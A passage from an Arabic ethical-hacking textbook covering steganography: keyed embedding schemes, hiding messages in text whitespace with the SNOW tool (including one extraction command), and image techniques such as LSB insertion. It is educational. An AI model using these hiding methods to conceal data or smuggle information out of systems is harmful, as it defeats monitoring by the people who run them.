‫واﻟﻣﻠﻔﺎت اﻟﻧﺻﯾﺔ واﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ وأي ﺑﯾﺎﻧﺎت رﻗﻣﯾﺔ‪ .‬اﻟﻘﺻد ﻣن ھذه اﻟﻌﻣﻠﯾﺔ ھو ﺗوﻓﯾر اﻟﺳرﯾﺔ‪ .‬ﻣﻊ ﺗﻘدم ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ ،‬اﻟرﺳﺎﺋل اﻟﻣﺧﻔﯾﺔ‬
‫داﺧل اﻟﺻور اﻟرﻗﻣﯾﺔ أﺻﺑﺣت اﻟﻧﻣوذج اﻷﻛﺛر ﺷﯾوﻋﺎ ً واﻟﻔﻌﺎل ﻟﻠﻐﺎﯾﺔ ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪ .‬ﯾﺗم ﺗﺧزﯾن اﻟﺻور ﻓﻲ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻛﻣﺟﻣوﻋﺔ‬
‫ﻣن وﺣدات اﻟﺑﻛﺳل‪ ،‬ﺑﻣﻘدار ﺑﻛﺳل واﺣد ﺑﻧﺣو ﻣن ‪ 8‬إﻟﻰ ‪ 24‬ﺑت‪ .‬ﯾﺗم ﺗﺧزﯾن ھذه اﻟﻣﺟﻣوﻋﺔ ﻣن اﻟﺑﻛﺳل ﻓﻲ ﻣﻠف ﺻورة وﻓﻘﺎ ﻷي واﺣد ﻣن‬
‫ﻋدد ﻣن اﻷﺷﻛﺎل‪ .‬ھﻧﺎك اﺛﻧﯾن ﻣن اﻟﻣﻠﻔﺎت اﻟذي ﺳوف ﻧﺣﺗﺎﺟﮭم ﻓﻲ إﺧﻔﺎء رﺳﺎﻟﺔ داﺧل ﻣﻠف اﻟﺻورة‪.‬‬
‫ھذﯾن اﻟﻣﻠﻔﯾن ھﻣﺎ‪:‬‬
‫‪ .1‬اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﺻورة اﻟﺗﻲ ﻣن اﻟﻣﻔﺗرض أن ﺗوﺿﻊ اﻟرﺳﺎﻟﺔ ﻓﯾﮫ‪.‬‬
‫‪ .2‬اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟرﺳﺎﻟﺔ ﻧﻔﺳﮭﺎ‪.‬‬

‫‪Types of Steganography‬‬

‫‪ Steganography‬ھو ﻓن وﻋﻠم ﻛﺗﺎﺑﺔ اﻟرﺳﺎﺋل اﻟﻣﺧﻔﯾﺔ ﻓﻲ ﻣﺛل ھذه اﻟطرﯾﻘﺔ ﻻ أﺣد ﻏﯾر اﻟﻣﺗﻠﻘﻲ ﯾﻌرف ﻣن وﺟود اﻟرﺳﺎﻟﺔ‪ .‬ﻣﻊ زﯾﺎدة‬
‫اﻻﺳﺗﺧداﻣﺎت اﻟﻣﺗزاﯾدة ﻟﺻﯾﻎ اﻟﻣﻠﻔﺎت اﻻﻟﻛﺗروﻧﯾﺔ ﻣﻊ اﻟﺗﻛﻧوﻟوﺟﯾﺎت اﻟﺟدﯾدة أﺻﺑﺢ ﻣن اﻟﻣﻣﻛن إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت‪ .‬إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻷﺳﺎﺳﯾﺔ ﯾﻣﻛن‬
‫ﺗﻘﺳﯾﻣﮭﺎ إﻟﻰ ﻣﺟﺎﻟﯾن‪ :‬إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت )‪ (data hiding‬وأﻧﺷﺎء اﻟوﺛﺎﺋﻖ )‪ .(document making‬أﻧﺷﺎء اﻟوﺛﺎﺋﻖ )‪(document making‬‬
‫ﯾﺗﻌﺎﻣل ﻣﻊ اﻟﺣﻣﺎﯾﺔ ﺿد اﻹزاﻟﺔ‪/‬اﻟﻣﺳﺢ‪ .‬وﺗﻧﻘﺳم ھﻲ اﻷﺧرى اﻟﻰ اﻟﻌﻼﻣﺎت اﻟﻣﺎﺋﯾﺔ )‪ (watermarking‬واﻟﺑﺻﻣﺎت )‪. (Fingerprinting‬‬
‫ﯾﺗم ﺳرد أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن ‪ Steganography‬ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪462‬‬

‫ﻣﺧططﺎت أﻣن ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت "‪"Data Embedding Security Schemes‬‬


‫ﻓﻲ ﻣﻌظم اﻟﺣﺎﻻت‪ ،‬ﯾؤﺳس اﺧﺗﯾﺎر ﺧوارزﻣﯾﺔ اﻟﺗﺿﻣﯾن ﻋﻠﻰ ﻧﺗﺎﺋﺞ ﺗﺣﻠﯾل ﻣﺗﺎﻧﺔ ﻗﻧﺎة اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ“ ‪. "channel robustness analysis‬‬
‫واﺣدة ﻣن اﻟﻣﻧﺎطﻖ اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﺗﺣﺳﯾن ﻣﺗﺎﻧﺔ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ھو اﺳﺗﺧدام ﻣﺧطط ﻣﻔﺗﺎﺣﻲ‪ ،“ key scheme"،‬ﻟﺗﺿﻣﯾن اﻟرﺳﺎﺋل‪ .‬ﻣﺧﺗﻠف‬
‫ﻣﺧططﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟرﺋﯾﺳﯾﺔ ﻟدﯾﮭﺎ ﻣﺳﺗوﯾﺎت ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﺣﻣﺎﯾﺔ‪ .‬ﻣﺻطﻠﺢ "ﻣﺧطط ﻣﻔﺗﺎﺣﻲ" ﯾﻌﻧﻲ إﺟراﺋﯾﺔ ﺗوﺿﺢ ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ﻧظﺎم‬
‫ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻣﻔﺗﺎﺣﻲ‪ ،“ key steganographic system"،‬ﻋﻠﻰ أﺳﺎس ﻧطﺎق اﺳﺗﺧداﻣﮫ‪ .‬ﻋﻧدﻣﺎ ﺗﺗم زﯾﺎدة ﻣﺗﺎﻧﺔ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ ،‬ﯾﻧﺧﻔض‬
‫ﻋرض اﻟﻧطﺎق اﻟﺗرددي‪ ،‬ﻟﻧظﺎم اﻟﺗﺿﻣﯾن ﻛﻠﮫ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ ﻓﺈن ﻣﮭﻣﺔ اﺧﺗﯾﺎر ﻣﺧطط ﻟﺗﺣﻘﯾﻖ اﻟﻘﯾم اﻟﻣﺛﻠﻰ ﻟﻠﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻟﯾﺳت ھﯾﻧﺔ‪ .‬ﯾﻣﻛن‬
‫ﺗﺿﻣﯾن اﻟرﺳﺎﺋل ﻓﻲ اﻟﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻣن دون اﺳﺗﺧدام ﻣﻔﺗﺎح أو ﻣﻊ اﺳﺗﺧدام ﻣﻔﺗﺎح‪ .‬ﻟﺗﺣﺳﯾن ﻣﺗﺎﻧﺔ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ ،‬ﯾﻣﻛن اﺳﺗﺧدام‬
‫ﻣﻔﺗﺎح ﻛﺧﯾﺎر ﻟﻠﺗﺣﻘﻖ‪ .‬وﯾﻣﻛن ان ﯾﻛون ﻟﮫ ﺗﺄﺛﯾر ﻋﻠﻰ ﺗوزﯾﻊ ﺑﺗﺎت ﻣن اﻟرﺳﺎﻟﺔ داﺧل ﺣﺎوﯾﺔ‪ ،‬وﻛذﻟك ﻟﮫ ﺗﺄﺛﯾر ﻋﻠﻰ إﺟراﺋﯾﺔ ﺗﺷﻛﯾل ﺗﺳﻠﺳل اﻟﺑﺗﺎت‬
‫اﻟرﺳﺎﻟﺔ اﻟﻣﺿﻣﻧﺔ‪ .‬ﯾﺗم ﺗﺣدﯾد اﻟﻣﺳﺗوى اﻷول ﻣن اﻟﺣﻣﺎﯾﺔ ﻋن طرﯾﻖ اﺧﺗﯾﺎر ﻣن ﺧوارزﻣﯾﺔ اﻟﺗﺿﻣﯾن ﻓﻘط‪ .‬ﻗد ﯾﻛون ھذا اﻻﺧﺗﯾﺎر ھو ﺧوارزﻣﯾﺔ‬
‫ﺗﻌدﯾل )اﻟﺑت اﻷﻗل أھﻣﯾﺔ()‪ ، (LSB) (least significant bit‬أو ﺧوارزﻣﯾﺎت ﺗﻌدﯾل ﺧﺻﺎﺋص اﻟﺣﺎوﯾﺔ‪ ،‬اﻟﻣﻛﺎﻧﯾﺔ‪-‬اﻟزﻣﺎﻧﯾﺔ‪،(spatial-temporal) ،‬‬
‫أو اﻟﺗردد‪ .‬ﯾﺗم ﺗﻘدﯾم اﻟﻣﺳﺗوى اﻷول ﻣن اﻟﺣﻣﺎﯾﺔ ﻓﻲ أي ﻗﻧﺎة ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ .‬ﯾﻣﻛن ﺗﻣﺛﯾل ﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ‬
‫ﺷﻛل ﻣﺧطط ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻷول‪ .‬وﺗﺳﺗﺧدم ﻓﯾﮫ اﻟﺗرﻣﯾزات اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬ﻣﻠف اﻟﺣﺎوﯾﺔ )‪(C‬‬
‫‪ -‬ﻓﺿﺎء ﻗﻧﺎة اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ )ﺗردد أو ‪ /‬وﺳﻌﺔ ﺟزء اﻟﺣﺎوﯾﺔ‪،‬‬
‫اﻟﻣﺗﺎح ﻟﻠﺗﻌدﯾل اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ وﻧﻘل إﺷﺎرات اﻟرﺳﺎﻟﺔ()‪(F‬‬
‫‪ -‬ﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ )‪(SC‬‬
‫‪ -‬اﻟرﺳﺎﻟﺔ اﻟﻣطﻠوب ﺗﺿﻣﯾﻧﮭﺎ )‪(m‬‬
‫‪ -‬أﺳﻠوب اﻟﺗﺿﻣﯾن )‪(E‬‬
‫‪ -‬ﻣﻠف اﻟﺣﺎوﯾﺔ اﻟﻣﻌدل )^‪(c‬‬
‫ﯾﺗﻣﯾز ﻣﺳﺗوى ﺣﻣﺎﯾﺔ اﻟﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺛﺎﻧﻲ‪ ،‬ﻓﺿﻼ ﻋن ﺟﻣﯾﻊ ﻣﺳﺗوﯾﺎت اﻟﺣﻣﺎﯾﺔ ﻓﻲ اﻟﻣراﺗب اﻟﻌﻠﯾﺎ‪ ،‬ﺑﺎﺳﺗﺧدام ﻣﻔﺗﺎح )ﻛﻠﻣﺔ اﻟﺳر( ﺧﻼل‬
‫اﻟﺗﻌدﯾل اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ .‬ﻣﺛﺎل ﻋﻠﻰ ﻣﺧطط ﻣﻔﺗﺎح ﺑﺳﯾط‪ ،‬اﻟذي ﯾوﻓر اﻟﻣﺳﺗوى اﻟﺛﺎﻧﻲ ﻣن اﻟﺣﻣﺎﯾﺔ‪ ،‬ھو أن ﺗﻛﺗب ﻛﻠﻣﺔ اﻟﻣرور ﻏﯾر اﻟﻣﻌدﻟﺔ أو‬
‫اﻟﻣﻌدﻟﺔ‪ ،‬ﻓﻲ أﻋﻠﻰ أو أﺳﻔل اﻟرﺳﺎﻟﺔ‪ ،‬أو ﺗوزﯾﻊ ﻋﻼﻣﺔ ﻛﻠﻣﺔ اﻟﻣرور ﻋﻠﻰ طول ﻗﻧﺎة اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ .‬ﻣﺛل ﻣﺧططﺎت اﻟﻣﻔﺗﺎح ھذه ﻻ ﺗؤﺛر ﻓﻲ‬
‫ﺗوزﯾﻊ اﻟرﺳﺎﺋل ﺧﻼل اﻟﺣﺎوﯾﺔ وﻻ ﺗﺳﺗﺧدم ﻣﻌﺎﻟﺟﺔ رﺳﺎﻟﺔ وﻓﻘﺎ ﻟﻠﻣﻔﺗﺎح اﻟﻣﻌرف )اﻧظر اﻟﺷﻛل ﻣﺧطط ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻟﺛﺎﻧﻲ(‪ .‬ﯾﺳﺗﺧدم ﻣﺛل ھذا‬
‫اﻟﻧوع ﻣن أﻧظﻣﺔ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻓﻲ ﻣﮭﺎم‪ ،‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إﺿﺎﻓﺔ اﻟﺗوﻗﯾﻊ اﻟرﻗﻣﻲ ﻹﺛﺑﺎت ﺣﻘوق اﻟطﺑﻊ واﻟﻧﺷر‪ .‬ﻟن ﯾﺗﻐﯾر أداء ﺗﺿﻣﯾن‬
‫اﻟﺑﯾﺎﻧﺎت ﺑﺎﻟﻣﻘﺎرﻧﺔ ﻣﻊ اﺳﺗﺧدام أﺳرع أﺳﻠوب ﻣن ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻷول‪.‬‬
‫ﻗﻧوات ﺑﯾﺎﻧﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺗﻲ ﺗﺳﺗﺧدم ﺗوزﯾﻊ رﺳﺎﻟﺔ‪ ،‬ﯾﺳﺗﻧد إﻟﻰ ﻣﺧططﺎت ﻣﻔﺗﺎح‪ ،‬ﺧﻼل اﻟﺣﺎوﯾﺔ‪ ،‬و‪/‬أو ﯾﻌﺎﻟﺞ رﺳﺎﻟﺔ ﻣﺿﻣﻧﺔ ﻹﺧﻔﺎء‬
‫اﻟﺑﯾﺎﻧﺎت ھﻲ أﻛﺛر أﻣﻧﺎ‪ .‬ﻋﻧدﻣﺎ ﯾﺗم اﺳﺗﺧدام ﻧظﺎم ﻣﻔﺗﺎح ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻟﺛﺎﻟث‪ ،‬ﻓﺄﻧﮫ ﯾؤﺛر ﻋﻠﻰ ﺗوزﯾﻊ اﻟرﺳﺎﻟﺔ ﺧﻼل اﻟﺣﺎوﯾﺔ‪) .‬اﻧظر اﻟﺷﻛل‬
‫ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻟﺛﺎﻟث( ﺣﯾث‪:‬‬
‫‪ - F(P, L) -‬داﻟﺔ ﺗوزﯾﻊ ﻟرﺳﺎﻟﺔ داﺧل ﺣﺎوﯾﺔ‪.‬‬
‫‪ - P -‬اﻟﺣد اﻷدﻧﻰ ﻟﻌدد اﻟﻌﯾﻧﺎت اﻟﺣﺎوﯾﺔ اﻟﻼزﻣﺔ ﻟﺗﺿﻣﯾن ﻋﯾﻧﺔ رﺳﺎﻟﺔ واﺣدة‪.‬‬
‫‪ - L -‬ﺧطوة ﺗوزﯾﻊ اﻟرﺳﺎﻟﺔ داﺧل ﺣﺎوﯾﺔ‪.‬‬
‫وﻓﻘﺎ ﻟذﻟك‪ ،‬ﻓﺈن أداء ﻣﻌﺎﻟﺟﺔ اﻟﺣﺎوﯾﺎت ﺗﻛون أﻗل ﻣﻣﺎ ﻛﺎﻧت ﻋﻠﯾﮫ ﻓﻲ ﺣﺎﻟﺔ ﻣﺧططﺎت اﻟﻣﻔﺗﺎح اﻷول واﻟﺛﺎﻧﻲ‪ .‬ﻣﻊ اﻷﺧذ ﺑﻌﯾن اﻻﻋﺗﺑﺎر أن‪، P ≥ L‬‬
‫أﺑﺳط ﺗﻣﺛﯾل ﻟداﻟﺔ) ‪ ،F(P, L‬ﯾﻣﻛن أن ﺗﻛون ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪F(P, L) = cycle*L + step*P‬‬
‫ﺣﯾث )‪ (cycle‬دورة ھو رﻗم اﻟﻣﻘطﻊ اﻟﺣﺎﻟﻲ‪ ، L‬وﺧطوة )‪ (step‬ھو رﻗم ﻋﯾﻧﺔ اﻟرﺳﺎﻟﺔ اﻟﻣﺿﻣﻧﺔ‪.‬‬
‫اﻟﻔرق ﺑﯾن ﻣﺧطط ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻟراﺑﻊ واﻟﺛﺎﻟث ھو أﻧﮫ‪ ،‬ﺗﺳﺗﺧدم وظﯾﻔﺗﻲ ﺗوزﯾﻊ رﺳﺎﻟﺔ ﻓﻲ ﻧظﺎم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ ،‬داﺧل ﺣﺎوﯾﺔ‪ .‬اﻷول‬
‫ﻣﺳؤول ﻋن اﺧﺗﯾﺎر ﻋﯾﻧﺎت رﺳﺎﻟﺔ وﻓﻘﺎ ﻟداﻟﺔ ﻣﺎ ‪, G(Q, N),‬واﻟوظﯾﻔﺔ اﻟﺛﺎﻧﯾﺔ ‪ F(P, L),‬ﻣﺳؤوﻟﺔ ﻋن اﺧﺗﯾﺎر ﻣوﻗﻊ إﺧﻔﺎء ﻋﯾﻧﺔ رﺳﺎﻟﺔ‪ .‬ھﻧﺎ ‪Q‬‬
‫ﺣﺟم ﻛﺗﻠﺔ اﻟرﺳﺎﻟﺔ اﻟﻣطﻠوب إدراﺟﮭﺎ؛‪ N‬ﺣﺟم )ﺑﺎﻟﺑت( ﻣن ﻋﯾﻧﺔ واﺣدة ﻣن ﻣﻠف اﻟرﺳﺎﻟﺔ )اﻧظر اﻟﺷﻛل ﻣﺧطط ﻣﺳﺗوى اﻟﺣﻣﺎﯾﺔ اﻟراﺑﻊ(‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪463‬‬

‫واﺳﺗﻧﺎدا إﻟﻰ اﻟﻣﻧﺎﻗﺷﺔ اﻟواردة أﻋﻼه ﻓﻣن اﻟﻣﻣﻛن ﺗﻌرﯾف ﺟدول ﺗﺻﻧﯾف ﻣﺧططﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﻣﻔﺗﺎﺣﯾﺔ‪:‬‬

‫‪Whitespace Steganography Tool: SNOW‬‬

‫ﺑرﻧﺎﻣﺞ ‪ SNOW‬ﯾﺳﺗﺧدم ﻹﺧﻔﺎء اﻟرﺳﺎﺋل ﻓﻲ ﻧص ‪ ASCII‬ﻣن ﺧﻼل ﺗﺿﻣﯾن اﻟﻣﺳﺎﻓﺎت اﻟﺑﯾﺿﺎء ﻓﻲ ﻧﮭﺎﯾﺔ اﻷﺳطر‪ .‬ﻷن اﻟﻣﺳﺎﻓﺎت وال‬
‫‪ TAB‬ﻋﻣوﻣﺎ ﻏﯾر ﻣرﺋﯾﺔ ﺑﺎﻟﻧﺳﺑﺔ ل‪ ، text viewer‬اﻟرﺳﺎﻟﺔ ﻓﻌﻠﯾﺎ ً ﺗﻛون ﻣﺧﻔﯾﮫ ﻋن اﻟﻣراﻗﺑﯾن اﻟﻌﺎدﯾﯾن‪ .‬إذا ﺗم اﺳﺗﺧدام اﻟﺗﺷﻔﯾر ﻓﻲ اﻟﺑﻧﺎء‪ ،‬ﻓﺎﻧﮫ‬
‫ﻻ ﯾﻣﻛن ﻗراءة اﻟرﺳﺎﻟﺔ ﺣﺗﻰ وﻟو ﺗم اﻛﺗﺷﺎﻓﮭﺎ‪.‬‬

‫ﻟﻧﻔﻌل ذﻟك ﻧﻘوم ﺑﻔﺗﺢ ﺳطر اﻷواﻣر اﻟﺧﺎص ﺑﺎﻟوﯾﻧدوز )‪ (cmd‬ﺛم اﻻﻧﺗﻘﺎل اﻟﻰ اﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﺗطﺑﯾﻖ ‪.snow‬‬ ‫‪-‬‬
‫ﻧﻘوم ﺑﻛﺗﺎﺑﺔ رﺳﺎﻟﺔ ﻣﺎ وﻧﻛﺗب ﺑﮭﺎ ﻣﺛﻼ ‪ Hello world‬ﺛم ﻧﻘوم ﺑﺣﻔظﮭﺎ ﺑﺎﺳم ‪ readme.txt‬ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫ﻧﻘوم ﺑطﺑﺎﻋﺔ اﻻﻣر اﻟﺗﺎﻟﻲ ﻓﻲ ﺳطر اﻷواﻣر ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪464‬‬

‫وﯾﻛون ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫ھﻧﺎ ﺣﯾث ﻗﻣﻧﺎ ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ واﻟﺗﻲ ھﯾﺎ ‪ My swiss bank account number is 45656684512263‬ﻓﻲ ﻣﻠف اﻟﻧﺻﻲ‬ ‫‪-‬‬
‫‪ readme.txt‬ﺛم ﻗﻣﻧﺎ ﺑﺈﻧﺷﺎء ﻣﻠف ﺟدﯾد ‪ readme2.txt‬واﻟذي ﯾﺣﺗوي ھذا اﻟﻣﻠف ﻋﻠﻰ اﻟﻣﺣﺗوى اﻟﻣوﺟود ﺑداﺧل اﻟﻣﻠف‬
‫‪ readme.txt‬ﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ اﻟرﺳﺎﻟﺔ اﻟﻣﺷﻔرة واﺳﺗﺧداﻣﻧﺎ أﯾﺿﺎ رﻗم ﺳرى واﻟذي ﻣن ﺣﻼﻟﮫ ﯾﺗﯾﺢ اﻻطﻼع ﻋﻠﻰ اﻟرﺳﺎﻟﺔ‪.‬‬
‫ﻟرؤﯾﺔ ﻣﺣﺗوى اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﺎة ﻣرة أﺧرى ﻧﺳﺗﺧدم اﻻﺗﻲ‪:‬‬ ‫‪-‬‬
‫‪Snow –C –p “magic” readme2.txt‬‬

‫ﻟﻔﺣص اﻟﻣﻠف ﻓﻲ ‪ GUI‬ﻧﻘوم ﺑﻔﺗﺢ اﻟﻣﻠف ‪ readme2.txt‬ﺑﺎﻟﻣﺣرر ‪ notepad‬ﺛم ﻧﺧﺗﺎر ‪ Edit  Select all‬ﺣﯾث ﻧرى‬ ‫‪-‬‬
‫اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻋﻠﻰ ھﯾﺋﺔ ﻣﺳﺎﻓﺎت و ‪.TABS‬‬

‫‪Image Steganography‬‬
‫ﻣﻘﺪﻣﮫ‬

‫‪ Image steganography‬ﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك داﺧل ﺻورة‪ .‬ﺣﯾث ﯾﻣﻛﻧك اﻻﺳﺗﻔﺎدة ﻣن اﻟﺑت اﻟزاﺋدة ﻋن اﻟﺣﺎﺟﺔ‬
‫ﻟﻠﺻورة ﻹﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﺑداﺧﻠﮭﺎ‪ .‬اﻟﺑﺗﺎت ‪ bits‬اﻟزاﺋدة ﺗﻠك اﻟﺗﻲ ﻓﻲ اﻟﺻورة ﻟﮭﺎ ﺗﺄﺛﯾر ﺿﺋﯾل ﺟدا ً ﻋﻠﻰ اﻟﺻورة إذا ﺣدث ﺗﻐﯾر ﻟﮭﺎ‪ .‬اﻟﺗﻌدﯾﻼت‬
‫ﻋﻠﻰ اﻟﺑﺗﺎت ﻻ ﯾﺗم اﻟﻛﺷف ﻋﻧﮭﺎ ﺑﺳﮭوﻟﮫ‪ .‬ﯾﻣﻛﻧك إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑك داﺧل اﻟﺻور ﻓﻲ ﺗﻧﺳﯾﻘﺎت ﻣﺧﺗﻠﻔﺔ ﻣﺛل ‪ PNG‬و‪ JPG‬و‪BMP‬‬
‫وﻏﯾرھﺎ ﻣن ﺗﻧﺳﯾﻘﺎت اﻟﺻور اﻷﺧرى‪.‬‬
‫اﻟﺻور ﺗﻌﺗﺑر ﻣن أﻛﺛر اﻷدوات ﺷﻌﺑﯾﮫ اﻟﻣﺳﺗﺧدﻣﺔ ﻛﻐطﺎء ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧﻠﮭﺎ‪ .‬اﻷدوات اﻟﻣﺳﺗﺧدﻣﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور‬
‫ﺗﺳﺗﺧدم اﻟﺑت اﻟزاﺋدة ﻋن اﻟﺣﺎﺟﺔ ﻣن ﺑﯾﺎﻧﺎت اﻟﺻورة ﻟﺗﺣل ﻣﺣﻠﮭﺎ اﻟرﺳﺎﻟﺔ اﻟﻣراد إﺧﻔﺎﺋﮭﺎ ﺑطرﯾﻘﺔ ﺑﺣﯾث ﯾﻛون ﺗﺄﺛﯾرھﺎ ﻻ ﯾﻣﻛن ﻛﺷﻔﮫ ﺑﺎﻟﻌﯾن‬
‫اﻟﺑﺷرﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪465‬‬

‫ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اداﺧل ﻟﺻورة )‪ (Image Steganography Technique‬ﯾﻣﻛن ﺗﻘﺳﯾﻣﮭﺎ إﻟﻰ ﻣﺟﻣوﻋﺗﯾن‪Image domain :‬‬
‫و‪.transform domain‬‬
‫‪ -‬ﻓﻲ ﺗﻘﻧﯾﺔ ‪ ،Image (spatial) domain‬اﻟرﺳﺎﻟﺔ ﯾﺗم ﺗﺿﻣﯾﻧﮭﺎ ﻣﺑﺎﺷرة ﻓﻲ ﻛﺛﺎﻓﺔ ﺑﻛﺳل)‪. (intensity of the pixels‬‬
‫‪ -‬ﻓﻲ ﺗﻘﻧﯾﺎت )‪ ،transform domain (frequency‬ﯾﺗم ﺗﺣوﯾل اﻟﺻور أوﻻً ﺛم ﯾﺗم ﺗﺿﻣﯾن اﻟرﺳﺎﻟﺔ ﻓﻲ اﻟﺻورة‪.‬‬
‫ھﻧﺎك ﺛﻼﺛﺔ أﺳﺎﻟﯾب اﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﺻور ‪:‬‬
‫‪ -‬اﻟﺗﺿﻣﯾن ﺑدﻻ ﻣن اﻟﺑﺗﺎت اﻟﻣﮭﻣﻠﺔ )‪.(Least Significant Bit Insertion‬‬
‫‪ -‬اﻟﺗﻘﻧﻊ واﻟﻔﻠﺗرة )‪.(Masking and Filtering‬‬
‫‪ -‬اﻟﺧوارزﻣﯾﺎت واﻟﺗﺣول )‪.(Algorithms and Transformation‬‬

‫‪Least Significant Bit Insertion -1‬‬

‫‪ The Least Significant Bit Insertion technique‬ھو ﻣن أﻛﺛر اﻟﺗﻘﻧﯾﺎت اﻟﻣﺳﺗﺧدﻣﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور وذﻟك ﻣن‬
‫ﺧﻼل اﺳﺗﺧدام اﻗل ﺑﯾت ﻣﮭﻣل ])‪ [Least Significant Bit (LSB‬ﻟﻛل ﺑﻛﺳل ﻟﻼﺣﺗﻔﺎظ ﺑﺎﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك‪ LSB .‬ھو اﻟﺑت‬
‫اﻟﻣوﺟود ﻓﻲ أﻗﺻﻰ اﻟﯾﻣﯾن ﻣن ﻛل ﺑﻛﺳل ﻣن ﻣﻠف اﻟﺻورة‪ LSB .‬ھذا‪ ،‬إذا ﺗﻐﯾرت‪ ،‬ﻟﮫ ﺗﺄﺛﯾر ﺿﺋﯾل ﺟدا ً ﻋﻠﻰ اﻟﺻورة؛ ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ‪.‬‬
‫ﻹﺧﻔﺎء اﻟرﺳﺎﻟﺔ‪ ،‬ﯾﺟب أوﻻً ﻛﺳر اﻟرﺳﺎﻟﺔ وإدراج ﻛل ﺑت ﻣﻛﺎن ‪ LSB‬ﻟﻛل ﺑﻛﺳل ﻣن اﻟﺻورة ﺑﺣﯾث ﯾﻣﻛن ﻟﻠﻣﺗﻠﻘﻲ ﻓﻲ اﻟﻧﮭﺎﯾﺔ اﺳﺗرداد اﻟرﺳﺎﻟﺔ‬
